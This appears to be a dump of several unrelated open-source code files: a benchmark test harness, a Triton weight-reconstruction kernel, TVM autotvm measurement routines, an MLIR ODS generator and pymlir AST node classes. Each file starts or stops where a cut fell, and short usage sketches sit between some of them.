cases['qmcpack'] = Case(path='samples/qmcpack/workspace/NiO/dmc-a4-e48-batched_driver-DU8',
command='../../../build/bin/qmcpack', versions=['vp-opt'], options=['./NiO-fcc-S1-dmc.xml'], cleanup=False)
def __init__(self, name, arch, version=None):
self._name = name
self._arch = arch
self._version = version
self._configs = dict()
def name(self):
return self._name
def setup(self, choices):
pass
def _run_impl(self, case_name, version):
pass
def run(self, iterations=1):
cwd = os.getcwd()
for i in range(iterations):
for case_name, case in Test.cases.items():
if case_name not in self._configs:
continue
os.chdir(case.path)
if i == 0 and case.cleanup:
cleanup(self._arch)
self._run_impl(case_name, None)
os.chdir(cwd)
if self._version is None:
continue
for version in case.versions:
if version == self._version or self._version == 'all':
os.chdir(case.path + '-' + version)
if i == 0 and case.cleanup:
cleanup(self._arch)
self._run_impl(case_name, version)
os.chdir(cwd)
``` |
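For context, a hedged sketch of how this base class appears meant to be specialized: a subclass fills `self._configs` in `setup()` and implements `_run_impl()`. The class below is illustrative only (it just prints the command it would run) and assumes `test_cases` and its `utils` helper are importable:
```python
from test_cases import Test

class DryRunTest(Test):
    def setup(self, choices):
        # enable only the requested cases
        self._configs = {name: True for name in choices if name in Test.cases}

    def _run_impl(self, case_name, version):
        case = Test.cases[case_name]
        suffix = f" ({version})" if version else ""
        print(f"[{self._arch}] {case.command} {' '.join(case.options)}{suffix}")

# DryRunTest('dry-run', arch='sm_80', version='all').setup(['bfs'])
```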
{
"source": "Jokeren/RzLinear",
"score": 2
} |
#### File: rz_linear/impl/RzLinearIdx.py
```python
import torch
import triton
import triton.language as tl
def rz_linear_idx_tl(hashed_weight: torch.tensor,
K: int, N: int, H: int,
R3: int, R2: int, R1: int, R0: int,
BLOCK_SIZE_K: int = 32, BLOCK_SIZE_N: int = 32) -> torch.tensor:
'''
Reconstruct the original weight tensor using the hashed weight
Args:
hashed_weight (Tensor): (1xH) The compressed weight tensor
        K, N, H (int): Matrix dimensions
R3, R2, R1, R0 (int): Random numbers
BLOCK_SIZE_K, BLOCK_SIZE_N (int): Workload of each GPU block
Returns:
output (Tensor): A KxN tensor
'''
# TODO(Keren): make rzlinear more general for any shape
assert (H > (BLOCK_SIZE_K * BLOCK_SIZE_N))
assert (K % BLOCK_SIZE_K == 0)
assert (N % BLOCK_SIZE_N == 0)
# allocates output
weight = torch.empty((K, N), device=hashed_weight.device,
dtype=hashed_weight.dtype)
def grid(META): return (
triton.cdiv(K, META['BLOCK_SIZE_K']) *
triton.cdiv(N, META['BLOCK_SIZE_N']),
)
rz_linear_idx_kernel[grid](
hashed_weight, weight,
K, N, H,
R3, R2, R1, R0,
weight.stride(0), weight.stride(1),
num_warps=4,
BLOCK_SIZE_N=BLOCK_SIZE_N,
BLOCK_SIZE_K=BLOCK_SIZE_K
)
return weight
@triton.jit
def rz_linear_idx_kernel(
bh_ptr, b_ptr,
# Matrix dimensions
K, N, H,
# Random numbers
R3, R2, R1, R0,
# The stride variables represent how much to increase the ptr by when moving by 1
# element in a particular dimension. E.g. stride_am is how much to increase a_ptr
# by to get the element one row down (A has M rows)
stride_bk, stride_bn,
# Meta-parameters
BLOCK_SIZE_N: tl.constexpr, BLOCK_SIZE_K: tl.constexpr
):
pid = tl.program_id(axis=0)
grid_n = tl.cdiv(N, BLOCK_SIZE_N)
pid_k = pid // grid_n
pid_n = pid % grid_n
# Compute hash
bh_offset = bh_ptr + tl.arange(0, BLOCK_SIZE_K)[:, None] * \
BLOCK_SIZE_N + tl.arange(0, BLOCK_SIZE_N)[None, :]
bh_ptrs = bh_offset + ((pid_k * R3 + pid_n * R2 + R1) %
R0) % (H - BLOCK_SIZE_K * BLOCK_SIZE_N)
b_ptrs = b_ptr + pid_k * BLOCK_SIZE_K * stride_bk + pid_n * BLOCK_SIZE_N * stride_bn + \
tl.arange(0, BLOCK_SIZE_K)[:, None] * \
stride_bk + tl.arange(0, BLOCK_SIZE_N)[None, :]
bh = tl.load(bh_ptrs)
tl.store(b_ptrs, bh)
``` |
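A minimal sketch of reconstructing a full weight matrix from a compressed buffer with the helper above; the shapes and the R3..R0 values are arbitrary illustrative numbers, and it assumes a CUDA device, triton, and that the module is importable as `rz_linear.impl.RzLinearIdx`:
```python
import torch
from rz_linear.impl.RzLinearIdx import rz_linear_idx_tl

K, N, H = 128, 256, 4096                        # H must exceed BLOCK_SIZE_K * BLOCK_SIZE_N (32 * 32)
hashed_weight = torch.randn(H, device="cuda")   # the compressed 1 x H parameter buffer
weight = rz_linear_idx_tl(hashed_weight, K, N, H, R3=11, R2=7, R1=5, R0=3)
print(weight.shape)                             # torch.Size([128, 256])
```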
{
"source": "Jokeren/tvm",
"score": 2
} |
#### File: autotvm/measure/measure_methods.py
```python
import logging
import os
import time
from random import getrandbits
import threading
import numpy as np
from ... import ir_pass, build, build_config, nd, context, TVMError, register_func, \
target as _target, rpc as _rpc
from ...contrib import nvcc, util, ndk
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class HashMismatchError(ValueError):
"""Raised when the code hash of a submitted config doesn't match that on the
measure side """
pass
def request_remote(device_key, tracker_addr=None, priority=1, timeout=60):
"""request a remote session
Parameters
----------
device_key: string
device key of registered device in tracker
tracker_addr: Tuple(string, int), optional
The address of rpc tracker in (host, port) format.
If is none, will use environment variable "TVM_TRACKER_HOST"
and "TVM_TRACKER_PORT"
priority: int, optional
        The priority of this request; a larger value means higher priority
timeout: float, optional
The timeout of this session (units: seconds)
Returns
------
session: RPCSession
"""
# connect to the tracker
if tracker_addr:
host = tracker_addr[0] or os.environ['TVM_TRACKER_HOST']
port = tracker_addr[1] or int(os.environ['TVM_TRACKER_PORT'])
else:
host = os.environ['TVM_TRACKER_HOST']
port = int(os.environ['TVM_TRACKER_PORT'])
tracker = _rpc.connect_tracker(host, port)
remote = tracker.request(device_key, priority=priority,
session_timeout=timeout)
return remote
def check_remote(target, device_key, tracker_addr=None, priority=2, timeout=10):
"""
Check the availability of a remote device
Parameters
----------
target: Target
The wanted compilation target
device_key: string
device key of registered device in tracker
tracker_addr: Tuple(string, int), optional
The address of rpc tracker in (host, port) format.
If is none, will use environment variable "TVM_TRACKER_HOST"
and "TVM_TRACKER_PORT"
priority: int, optional
        The priority of this request; a larger value means higher priority
timeout: float, optional
The timeout of this check (units: seconds).
If time is out, a RuntimerError will be raised.
"""
def _check():
remote = request_remote(device_key, tracker_addr, priority)
remote.context(str(target))
t = threading.Thread(target=_check,)
t.start()
t.join(timeout)
return not t.is_alive()
def create_measure_batch(task, option):
"""Get a standard measure_batch function.
Parameters
----------
task: tvm.autotvm.task.Task
The tuning task
option: dict
The option for measuring generated code.
You should use the return value of function :any:`measure_option` for this argument.
Returns
-------
measure_batch: callable
a callback function to measure a batch of configs
"""
from ..database import filter_inputs
measure_func = option['measure_func']
number, repeat = option['number'], option['repeat']
timeout, n_parallel, do_fork = option['timeout'], option['n_parallel'], option['do_fork']
build_func = option['build_func']
check_correctness = option['check_correctness']
replay_db = option['replay_db']
executor = LocalExecutor(timeout=timeout, do_fork=do_fork)
# convert convenient string to function object
attach_objects = None
if measure_func == 'local':
# start temporary rpc tracker and rpc server for the user
from ...rpc.tracker import Tracker
from ...rpc.server import Server
tracker = Tracker('localhost', port=9000, port_end=10000, silent=True)
device_key = '$local$device$%d' % tracker.port
server = Server('localhost', port=9000, port_end=10000,
key=device_key,
use_popen=True, silent=True,
tracker_addr=(tracker.host, tracker.port))
measure_func = rpc(device_key, tracker.host, tracker.port)
attach_objects = (server, tracker)
build_kwargs = {}
if build_func == 'default':
build_func = default_build_func
if build_func == 'ndk':
build_func = default_build_func
build_kwargs['use_ndk'] = True
# check the availability of remote devices
if hasattr(measure_func, 'rpc_info'):
rpc_info = measure_func.rpc_info
if check_remote(task.target, rpc_info['key'], (rpc_info['host'], rpc_info['port'])):
logger.info("Get devices for measurement successfully!")
else:
raise RuntimeError("Cannot get remote devices from the tracker. "
"Please check the status of tracker by "
"'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
"and make sure you have free devices on the queue status.")
# add device info of cuda and opencl target
if ('cuda' in task.target.keys or 'opencl' in task.target.keys) \
and hasattr(measure_func, 'rpc_info'):
rpc_info = measure_func.rpc_info
add_gpu_target_info(task.target, rpc_info["key"], (rpc_info["host"], rpc_info["port"]),
build_kwargs)
if check_correctness:
# use llvm cpu to generate a reference input/output
# this option works for tuning topi, but might not work for you custom op
with _target.create("llvm"):
s, arg_bufs = task.instantiate(task.config_space.get(0))
ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
for x in arg_bufs]
func = build(s, arg_bufs, "llvm")
tvm_buf = [nd.array(x) for x in ref_input]
func(*tvm_buf)
ref_output = [x.asnumpy() for x in tvm_buf]
else:
ref_input = ref_output = None
def measure_batch(measure_inputs):
"""measure the time cost for a batch of configs in real machines"""
if replay_db is not None:
partial_results, measure_inputs = \
filter_inputs(replay_db, measure_inputs, retry=False)
# launch measure jobs in parallel
pack_size = getattr(measure_func, "pack_size", 1) # measure `pack_size` inputs in one job
futures = []
for i in range(0, len(measure_inputs), pack_size):
input_pack = measure_inputs[i:i + pack_size]
ret = executor.submit(
measure_func,
input_pack,
build_func,
build_kwargs,
number,
repeat,
ref_input,
ref_output)
futures.append(ret)
# transform results
results = []
for future in futures:
result = future.get()
if isinstance(result, Exception):
tstamp = time.time()
results.extend([MeasureResult((result,), MeasureErrorNo.FLEET_ERROR,
timeout, tstamp)] * pack_size)
else:
results.extend(result)
if replay_db is not None:
result_idx = 0
for i in range(len(partial_results)):
if partial_results[i] is None:
partial_results[i] = results[result_idx]
result_idx += 1
return partial_results
return results
measure_batch.n_parallel = n_parallel
# attach server and tracker object to avoid them of being garbage-collected
measure_batch.attach_objects = attach_objects
return measure_batch
def rpc(key,
host=None,
port=None,
priority=1,
session_timeout=60,
pack_size=1):
"""
Create a standard measure_func which uses RPC Tracker for measurement.
This measure_func will request a device from the RPC Tracker and
upload the built binary library to that device for measurement.
Parameters
----------
key: str
The registered key of the device in tracker. The tuner will request devices for
measurement by this key.
host: str, optional
The hostname of RPC Tracker. If not set, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port of RPC Tracker. If not set, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
Priority of this task, used by scheduler in tracker
session_timeout: int, optional
Timeout of rpc session
pack_size: int, optional
The number of configs measure in one RPC session.
Usually this can be set to 1. If your device has high overhead to establish a
rpc connection, set this higher.
"""
def fmeasure(input_pack, build_func, build_kwargs, number, repeat, ref_input, ref_output):
"""Do measurement for a list of inputs inside a same RPC session.
Parameters
----------
input_pack: List of MeasureInput
The inputs of measurement
build_func: callable
Function for building the code. see :any:`default_build_func` for example
build_kwargs: dict
Extra arguments for build_func
number : int, optional
Number of times to do the measurement for average
repeat : int, optional
Number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up. The returned result contains `repeat` costs,
each of which is the average of `number` test run.
ref_input: List of numpy array
Reference input for correctness check
ref_output: List of numpy array
Reference output for correctness check
Returns
-------
results: List of MeasureResult
The results for input_pack
"""
remote = request_remote(key, (host, port), priority, session_timeout)
res = _measure_common(input_pack, build_func, build_kwargs, number, repeat,
ref_input, ref_output,
remote)
return res
fmeasure.pack_size = pack_size
fmeasure.rpc_info = {"key": key, "host": host, "port": port}
return fmeasure
def _measure_common(input_pack, build_func, build_kwargs, number, repeat,
ref_input=None, ref_output=None, remote=None):
"""Measure the time cost for a pack of inputs.
(Note: A pack is a list of inputs which will be measured inside a same RPC session)
Parameters
----------
input_pack : list of MeasureInput
The inputs we need to evaluate
build_func : function takes MeasureInput returns tuple of (time_func, ctx, args)
The build function used to build each input.
build_kwargs: Dict
The extra keyword arguments to build_func
number : int, optional
Number of times to do the measurement for average
repeat : int, optional
Number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up. The returned result contains `repeat` costs,
each of which is the average of `number` test run.
ref_input: Array of np.ndarray, optional
Reference input for checking correctness
ref_output: Array of np.ndarray, optional
Reference output for checking correctness
remote: RPCSession, optional
The remote RPC session
Returns
-------
res_pack : Array of MeasureResult
The list of results of measurement.
"""
res_pack = []
tmp_dir = util.tempdir() if remote else None
for inp in input_pack:
tic = time.time()
# build function
try:
func, arg_bufs, filename = build_func(inp, tmp_dir, **build_kwargs)
except TVMError as exc:
tstamp = time.time()
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
if "InstantiationError" in msg:
try:
msg = msg.split('\n')[-2].split(": ")[1]
except Exception: # pylint: disable=broad-except
pass
res_pack.append(MeasureResult((InstantiationError(msg),),
MeasureErrorNo.INSTANTIATION_ERROR,
tstamp - tic, tstamp))
else:
res_pack.append(MeasureResult((RuntimeError(msg),),
MeasureErrorNo.COMPILE_HOST,
tstamp - tic, tstamp))
continue
except InstantiationError as e:
tstamp = time.time()
res_pack.append(MeasureResult((InstantiationError(str(e)),),
MeasureErrorNo.INSTANTIATION_ERROR,
tstamp - tic, tstamp))
continue
# upload built module
if remote:
remote.upload(tmp_dir.relpath(filename))
func = remote.load_module(filename)
ctx = remote.context(str(inp.target), 0)
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat)
else:
ctx = context(str(inp.target), 0)
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat)
# measure time
errno = MeasureErrorNo.NO_ERROR
try:
if ref_input:
args = [nd.array(x, ctx=ctx) for x in ref_input]
else:
args = [nd.empty(get_const_tuple(x.shape), dtype=x.dtype, ctx=ctx)
for x in arg_bufs]
costs = time_f(*args).results
if len(costs) > 2: # remove largest and smallest value to reduce variance
costs = list(costs)
costs.sort()
costs = tuple(costs[1:-1])
if ref_output:
for expected, real in zip(ref_output, args):
if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
logger.warning("Wrong Answer!")
errno = MeasureErrorNo.WRONG_ANSWER
except TVMError as exc:
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
costs = (RuntimeError(msg),)
errno = MeasureErrorNo.RUNTIME_DEVICE
tstamp = time.time()
res_pack.append(MeasureResult(costs, errno, tstamp - tic, tstamp))
return res_pack
def default_build_func(inp, tmp_dir=None, **kwargs):
"""Build function module. Exception will be raised when any error occurs
Parameters
----------
inp: MeasureInput
The input of this measurement
tmp_dir: tvm.contrib.util.TempDirectory, optional
The temporary directory for exporting built binary library.
If is not None (in RPC mode), the library in this directory will be uploaded to
remote devices.
kwargs: Dict, optional
Other extra arguments
Returns
-------
func: Function
TVM built function. Typically this is the return value of tvm.build.
args: Array of Buffer or Tensor
The argument list for the function. Typically this is the second argument of tvm.build.
filename: str
The filename of the output build library
"""
# build function
with inp.target:
s, args = inp.task.instantiate(inp.config)
# check invalidity of template and code hash consistency
if not inp.config.valid():
raise InstantiationError(inp.config.errors)
code_hash = getattr(s, 'code_hash', None)
if inp.config.code_hash != code_hash:
raise HashMismatchError('got {0:s}, expected {1:s}'
.format(str(inp.config.code_hash), str(code_hash)))
opts = {}
if "check_gpu" in kwargs: # Add verify pass to filter out invalid configs in advance.
opts["add_lower_pass"] = [(2, gpu_verify_pass(**kwargs['check_gpu']))]
if 'cuda_arch' in kwargs:
set_cuda_target_arch(kwargs['cuda_arch'])
with build_config(**opts):
func = build(s, args, target_host=inp.task.target_host)
# export library to temp directory
if tmp_dir:
if kwargs.get('use_ndk', False): # for Android NDK
filename = "tmp_func_%0x.so" % getrandbits(64)
func.export_library(tmp_dir.relpath(filename), ndk.create_shared)
else:
filename = "tmp_func_%0x.tar" % getrandbits(64)
func.export_library(tmp_dir.relpath(filename))
else:
filename = None
return func, args, filename
def add_gpu_target_info(target, device_key, rpc_tracker_addr, kwargs):
"""Add device info for gpu target.
The info will be used to check the validity of generated code."""
remote = request_remote(device_key, rpc_tracker_addr)
ctx = remote.context(str(target), 0)
max_dims = ctx.max_thread_dimensions
kwargs['check_gpu'] = {
'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
'max_threads_per_block': ctx.max_threads_per_block,
'max_thread_x': max_dims[0],
'max_thread_y': max_dims[1],
'max_thread_z': max_dims[2],
}
if 'cuda' in target.keys:
kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))
def set_cuda_target_arch(arch):
"""set target architecture of nvcc compiler"""
AutotvmGlobalScope.current.cuda_target_arch = arch
@register_func
def tvm_callback_cuda_compile(code):
"""use nvcc to generate ptx code for better optimization"""
ptx = nvcc.compile_cuda(code, target="ptx", arch=AutotvmGlobalScope.current.cuda_target_arch)
return ptx
def gpu_verify_pass(**kwargs):
"""Verify the validity of a gpu kernel.
This pass will check memory usage and number of threads per block.
"""
def verify_pass(stmt):
valid = ir_pass.VerifyGPUCode(stmt, kwargs)
if not valid:
raise InstantiationError("Skipped because of invalid gpu kernel")
return stmt
return verify_pass
``` |
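A hedged sketch of the option dictionary consumed by `create_measure_batch` above; the keys mirror exactly what the function reads, while the device key, host and port are placeholders (in normal use this dict would come from `autotvm.measure_option`):
```python
from tvm.autotvm.measure.measure_methods import rpc, create_measure_batch

option = {
    'measure_func': rpc('1080ti', host='0.0.0.0', port=9190),  # or simply 'local'
    'number': 5,
    'repeat': 1,
    'timeout': 20,
    'n_parallel': 1,
    'do_fork': True,
    'build_func': 'default',
    'check_correctness': False,
    'replay_db': None,
}
# measure_batch = create_measure_batch(task, option)  # task: tvm.autotvm.task.Task
# results = measure_batch(measure_inputs)             # measure_inputs: list of MeasureInput
```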
{
"source": "joker-eph/mlir-npcomp",
"score": 2
} |
#### File: torch_mlir_utils/codegen/generate_ods.py
```python
from typing import TextIO
import argparse
from contextlib import contextmanager
import importlib
import logging
import re
import sys
import textwrap
from .registry import *
_INDENT = " "
class OdsEmitter:
ods_prefix = "ATen_"
ods_suffix = "Op"
ods_value_template = "ATen_ImmutableTensorOp"
ods_ref_template = "ATen_RefTensorOp"
op_prefix = ""
def __init__(self, r: OpRegistry, out: TextIO):
super().__init__()
self.r = r
self.out = out
self.indent_level = 0
def emit_ods(self):
for op_m in self.r.mappings:
if isinstance(op_m, SimpleOpMapping):
self._emit_simple_op_mapping(op_m)
else:
logging.warn(f"Unrecognized op mapping type: {op_m!r}")
def _emit_simple_op_mapping(self, op_m: SimpleOpMapping):
identifier = (f"{self.ods_prefix}"
f"{_snakecase_to_camelcase(op_m.mlir_operation_name)}"
f"{self.ods_suffix}")
traits = []
if op_m.is_outref_form:
template_name = self.ods_ref_template
summary = "See non-inplace op variant."
description = ""
else:
template_name = self.ods_value_template
summary, description = _split_docstring(op_m.op_f.__doc__)
if not op_m.is_outref_form:
traits.append("NoSideEffect")
self.print(f"def {identifier}: {template_name}"
f"<{_quote(op_m.mlir_operation_name)}, ["
f"{', '.join(traits)}"
f"]> {{")
# Summary.
with self.indent():
self.print(f"let summary = {_quote(summary)};")
# Arguments.
with self.indent():
self.print("let arguments = (ins")
with self.indent():
operand_len = len(op_m.operand_map)
for index, (_, value_spec) in enumerate(op_m.operand_map):
is_last = index == operand_len - 1
self.print(f"{value_spec.mlir_ods_predicate}:${value_spec.name}",
end="\n" if is_last else ",\n")
self.print(");")
# Results (omitted if an outref/inplace form).
with self.indent():
if op_m.is_outref_form:
self.print("let results = (outs);")
else:
self.print("let results = (outs")
with self.indent():
result_len = len(op_m.result_map)
for index, (_, value_spec) in enumerate(op_m.result_map):
is_last = index == result_len - 1
self.print(f"{value_spec.mlir_ods_predicate}:${value_spec.name}",
end="\n" if is_last else ",\n")
self.print(");")
# Description and extra class declarations.
with self.indent():
if description:
quoted_description = _quote_multiline_docstring(
description + op_m.append_description,
indent_level=self.indent_level)
self.print(f"let description = {quoted_description};")
self.print("}\n")
@contextmanager
def indent(self, level=1):
self.indent_level += level
yield
self.indent_level -= level
assert self.indent_level >= 0, "Unbalanced indentation"
def print(self, s, *, end="\n", indent=True):
if indent and self.indent_level:
self.out.write(_INDENT * self.indent_level)
self.out.write(s)
self.out.write(end)
def _snakecase_to_camelcase(ident: str):
return "".join(x.capitalize() or "_" for x in re.split(r"[\._]", ident))
def _quote(s: str):
s = s.replace(r'"', r'\\"')
return f'"{s}"'
def _quote_multiline_docstring(s: str, indent_level: int = 0):
# TODO: Possibly find a python module to markdown the docstring for better
# document generation.
  # Unlikely to contain the delimiter, and since it's just a docstring, be safe.
s = s.replace("}]", "")
# Strip each line.
s = "\n".join([l.rstrip() for l in s.splitlines()])
indent = _INDENT * indent_level
s = textwrap.indent(s, indent + _INDENT)
return "[{\n" + s + "\n" + indent + "}]"
def _split_docstring(docstring: str):
"""Splits the docstring into a summary and description."""
if not docstring:
docstring = ""
lines = docstring.splitlines()
if not lines:
return "", ""
# Skip leading blank lines.
while lines and not lines[0]:
lines = lines[1:]
if len(lines) > 2:
return lines[0], "\n".join(lines[2:])
else:
return lines[0], ""
def main(args):
r = OpRegistry()
# Populate from modules that provide a populate() function.
op_modules = [args.op_module]
for m_name in op_modules:
logging.info(f"Populating from module: {m_name}")
m = importlib.import_module(m_name, package=__package__)
f = getattr(m, "populate")
f(r)
out = sys.stdout
# Write file header.
module_name = sys.modules["__main__"].__loader__.name
banner_lines = [
"//===-------------------------------------------------------*- tablegen -*-===//",
"//",
"// This file is licensed under the Apache License v2.0 with LLVM Exceptions.",
"// See https://llvm.org/LICENSE.txt for license information.",
"// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception",
"//",
"// Operation summaries and descriptions were systematically derived from public",
"// API docstrings and are licensed accordingly:",
"// https://github.com/pytorch/pytorch/blob/master/LICENSE",
"//===----------------------------------------------------------------------===//",
"// This file is automatically generated. Please do not edit.",
"// Generated via:",
f"// python -m {module_name} {' '.join(sys.argv[1:])}",
"//===----------------------------------------------------------------------===//",
"",
"",
]
banner_lines = [l.strip() for l in banner_lines]
out.write("\n".join(banner_lines))
emitter = OdsEmitter(r, out=out)
emitter.emit_ods()
def _create_argparse():
parser = argparse.ArgumentParser(prog="generate_ods")
parser.add_argument(
"--op_module",
default=".aten_ops",
help="Name of a python module for populating the registry")
return parser
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
parser = _create_argparse()
args = parser.parse_args()
main(args)
``` |
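For orientation, a hedged sketch of the contract expected from the module passed via `--op_module`: `main()` imports it and calls its `populate()` with the `OpRegistry`. The body below is deliberately a stub, since the registration calls themselves depend on the registry API defined in `.registry`:
```python
# Sketch of a minimal op module usable with --op_module (illustrative only).
def populate(registry):
    # Register SimpleOpMapping entries (or other mappings) on the OpRegistry here,
    # as the bundled .aten_ops module does; generate_ods.main() will then emit one
    # ODS "def" per registered mapping.
    pass
```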
{
"source": "joker-eph/pymlir",
"score": 3
} |
#### File: pymlir/mlir/astnodes.py
```python
from enum import Enum, auto
from typing import Any, List, Union
from lark import Token
class Node(object):
""" Base MLIR AST node object. """
# Static field defining which fields should be used in this node
_fields_: List[str] = []
def __init__(self, node: Token = None, **fields):
# Set each field separately
if node is not None and isinstance(node, list):
for fname, fval in zip(self._fields_, node):
setattr(self, fname, fval)
# Set the defined fields
for k, v in fields.items():
setattr(self, k, v)
def dump_ast(self) -> str:
""" Dumps the AST node and its fields in raw AST format. For example:
Module(name="example", body=[])
:note: Due to the way objects are constructed, this format can be
parsed back by Python to the same AST.
:return: String representing the AST in its raw format.
"""
return (type(self).__name__ + '(' + ', '.join(
f + '=' + _dump_ast_or_value(getattr(self, f))
for f in self._fields_) + ')')
def dump(self, indent: int = 0) -> str:
""" Dumps the AST node and its children in MLIR format.
:return: String representing the AST in MLIR.
"""
return '<UNIMPLEMENTED>'
def __repr__(self):
return (type(self).__name__ + '(' + ', '.join(
f + '=' + str(getattr(self, f)) for f in self._fields_) + ')')
def pretty(self):
return self.dump()
# result = self.dump_ast()
# lines = ['']
# indent = 0
# for char in result:
# if char == '[':
# indent += 1
# if char == ']':
# indent -= 1
# if char != '\n':
# lines[-1] += char
# if char in '[\n':
# lines.append(indent * ' ')
#
# return '\n'.join(lines)
class StringLiteral(object):
def __init__(self, value: str):
self.value = value
def __str__(self):
return '"%s"' % self.value
def __repr__(self):
return '"%s"' % self.value
##############################################################################
# Identifiers
class Identifier(Node):
_fields_ = ['value']
# Static field representing the prefix of this identifier. Used for ease
# of MLIR output
_prefix_: str = ''
def dump(self, indent: int = 0) -> str:
return self._prefix_ + self.value
class SsaId(Identifier):
_fields_ = ['value', 'index']
_prefix_ = '%'
def __init__(self, node: Token = None, **fields):
self.value = node[0]
self.index = node[1] if len(node) > 1 else None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
if self.index:
return self._prefix_ + self.value + ("#%s" % self.index)
return self._prefix_ + self.value
class SymbolRefId(Identifier):
_prefix_ = '@'
class BlockId(Identifier):
_prefix_ = '^'
class TypeAlias(Identifier):
_prefix_ = '!'
class AttrAlias(Identifier):
_prefix_ = '#'
class MapOrSetId(Identifier):
_prefix_ = '#'
##############################################################################
# Types
class Type(Node):
pass
class Dimension(Type):
_fields_ = ['value']
def __init__(self, node: Token = None, **fields):
self.value = None
try:
if isinstance(node[0], int):
self.value = node[0]
except (IndexError, TypeError):
pass # In case of an unknown size
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return str(self.value or '?')
class NoneType(Type):
def dump(self, indent: int = 0) -> str:
return 'none'
class FloatTypeEnum(Enum):
f16 = auto()
bf16 = auto()
f32 = auto()
f64 = auto()
class FloatType(Type):
_fields_ = ['type']
def __init__(self, node: Token = None, **fields):
super().__init__(node, **fields)
if 'type' not in fields:
self.type = FloatTypeEnum[node[0]]
def dump(self, indent: int = 0) -> str:
return self.type.name
class IndexType(Type):
def dump(self, indent: int = 0) -> str:
return 'index'
class IntegerType(Type):
_fields_ = ['width']
def dump(self, indent: int = 0) -> str:
return 'i' + str(self.width)
class ComplexType(Type):
_fields_ = ['type']
def dump(self, indent: int = 0) -> str:
return 'complex<%s>' % self.type.dump(indent)
class TupleType(Type):
_fields_ = ['types']
def __init__(self, node: Token = None, **fields):
self.types = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return 'tuple<%s>' % dump_or_value(self.types, indent)
class VectorType(Type):
_fields_ = ['dimensions', 'element_type']
def dump(self, indent: int = 0) -> str:
return 'vector<%s>' % ('x'.join(
dump_or_value(t, indent)
for t in self.dimensions) + 'x' + self.element_type.dump(indent))
class RankedTensorType(Type):
_fields_ = ['dimensions', 'element_type']
def dump(self, indent: int = 0) -> str:
return 'tensor<%s>' % ('x'.join(
t.dump(indent)
for t in self.dimensions) + 'x' + self.element_type.dump(indent))
class UnrankedTensorType(Type):
_fields_ = ['element_type']
def __init__(self, node: Token = None, **fields):
# Ignore unranked dimension list
super().__init__(node[1:], **fields)
def dump(self, indent: int = 0) -> str:
return 'tensor<*x%s>' % self.element_type.dump(indent)
class RankedMemRefType(Type):
_fields_ = ['dimensions', 'element_type', 'layout', 'space']
def __init__(self, node: Token = None, **fields):
self.dimensions = node[0]
self.element_type = node[1]
self.layout = None
self.space = None
if len(node) > 2:
if node[2].data == 'memory_space':
self.space = node[2].children[0]
elif node[2].data == 'layout_specification':
self.layout = node[2].children[0]
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = 'memref<%s' % ('x'.join(
t.dump(indent)
for t in self.dimensions) + 'x' + self.element_type.dump(indent))
if self.layout is not None:
result += ', ' + self.layout.dump(indent)
if self.space is not None:
result += ', ' + dump_or_value(self.space, indent)
return result + '>'
class UnrankedMemRefType(Type):
_fields_ = ['element_type', 'space']
def __init__(self, node: Token = None, **fields):
self.element_type = node[0]
self.space = None
if len(node) > 1:
self.space = node[1].children[0]
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = 'memref<%s' % ('*x' + self.element_type.dump(indent))
if self.space is not None:
result += ', ' + dump_or_value(self.space, indent)
return result + '>'
class OpaqueDialectType(Type):
_fields_ = ['dialect', 'contents']
def dump(self, indent: int = 0) -> str:
return '!%s<"%s">' % (self.dialect, self.contents)
class PrettyDialectType(Type):
_fields_ = ['dialect', 'type', 'body']
def dump(self, indent: int = 0) -> str:
return '!%s.%s<%s>' % (self.dialect, self.type, ', '.join(
dump_or_value(item, indent) for item in self.body))
class FunctionType(Type):
_fields_ = ['argument_types', 'result_types']
def dump(self, indent: int = 0) -> str:
result = '(%s)' % ', '.join(
dump_or_value(arg, indent) for arg in self.argument_types)
result += ' -> '
if not self.result_types:
result += '()'
elif len(self.result_types) == 1:
result += dump_or_value(self.result_types[0], indent)
else:
result += '(%s)' % ', '.join(
dump_or_value(res, indent) for res in self.result_types)
return result
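# Dump sketch (hedged): with argument types dumping as "i32" and "f32" and one result type
# dumping as "i1", FunctionType.dump() renders "(i32, f32) -> i1"; with no result types it
# renders "(i32, f32) -> ()", following the branches above.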
class StridedLayout(Node):
_fields_ = ['offset', 'strides']
def dump(self, indent: int = 0) -> str:
return 'offset: %s, strides: %s' % (dump_or_value(
self.offset, indent), dump_or_value(self.strides, indent))
##############################################################################
# Attributes
# Attribute entries
class AttributeEntry(Node):
_fields_ = ['name', 'value']
def __init__(self, node: Token = None, **fields):
self.name = node[0]
self.value = node[1] if len(node) > 1 else None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
if self.value:
return '%s = %s' % (dump_or_value(self.name, indent),
dump_or_value(self.value, indent))
return dump_or_value(self.name, indent)
class DialectAttributeEntry(Node):
_fields_ = ['dialect', 'name', 'value']
def __init__(self, node: Token = None, **fields):
self.dialect = node[0]
self.name = node[1]
self.value = node[2] if len(node) > 2 else None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
if self.value:
